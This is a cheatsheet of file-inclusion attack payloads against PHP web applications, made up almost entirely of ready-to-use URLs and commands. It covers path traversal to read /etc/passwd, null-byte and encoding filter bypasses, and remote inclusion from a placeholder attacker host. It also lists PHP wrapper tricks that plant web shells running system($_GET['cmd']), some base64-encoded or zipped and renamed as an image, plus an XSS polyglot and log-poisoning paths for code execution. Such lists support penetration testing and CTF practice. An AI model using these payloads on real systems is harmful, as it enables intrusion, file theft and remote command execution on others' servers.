📀LFI Cheatsheet
File Inclusion Cheatsheet
Basics:
http://vulnerable-site.com/index.php?page=../../../etc/passwd
http://vulnerable-site.com/index.php?page=....//....//....//etc/passwd
http://vulnerable-site.com/index.php?page=....\/....\/....\/etc/passwd
http://vulnerable-site.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
--------------------------------------------------------------------
Null Byte Injection:
http://vulnerable-site.com/index.php?page=/etc/passwd%00
http://vulnerable-site.com/index.php?page=/etc/passwd()
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00.png
--------------------------------------------------------------------
Encoding:
http://vulnerable-site.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
--------------------------------------------------------------------
From an Existent Folder:
http://vulnerable-site.com/index.php?page=utils/scripts/../../../../../etc/passwd
--------------------------------------------------------------------
Path Truncation:
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://vulnerable-site.com/ind ex.php?page=a/./.[ADD MORE]/etc/passwd
http://vulnerable-site.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
--------------------------------------------------------------------
Filter Bypass:
http://vulnerable-site.com/index.php?page=....//....//etc/passwd
http://vulnerable-site.com/index.php?page=..///////..////..//////etc/passwd
http://vulnerable-site.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd http://vulnerable-site.com/index.php?page=/var/www/../../etc/passwd
--------------------------------------------------------------------
RFI:
http://vulnerable-site.com/index.php?page=http://atacker.com/evil.php
http://vulnerable-site.com/index.php?page=\\attacker.com\evil.php
--------------------------------------------------------------------
PHP Wrappers: filter
php://filter/resource=file name here
http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=file name here
http://vulnerable-site.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://vulnerable-site.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index
Bonus:
You can also create a polyglot payload by infecting the reflected PHP error with an XSS payload as an invalid filter:
(_Click on the "eye" icon in the top right corner of the "RESULT" tab to render HTML and to see the XSS pop. _)
php://filter/<script>alert(1)<%2fscript>/resource=flag.txt
--------------------------------------------------------------------
PHP wrapper: zlib
http://vulnerable-site.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
--------------------------------------------------------------------
PHP wrapper: ZIP
echo “<pre><?php system($_GET[‘cmd’]); ?></pre>” > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://vulnerable-site.com/index.php?page=zip://shell.jpg%23payload.php
--------------------------------------------------------------------
PHP wrapper: Data
http://vulnerable-site.com/?page=data:text/plain,<?system($_GET['x']);?>&x=ls
http://vulnerable-site.com/?page=data:,<?system($_GET['x']);?>&x=ls
http://vulnerable-site.com/?page=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
http://vulnerable-site.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents(“index.php”)); ?>
http://vulnerable-site.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
The payload: “<?php system($_GET[‘cmd’]);”Common log Files
/var/www/logs/access.log
/var/log/apache/access.log
/etc/httpd/logs/acces_log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.logUser-Agents payloads to Get RCE
<?php phpinfo(); ?>
<?php echo system('env') ?>Last updated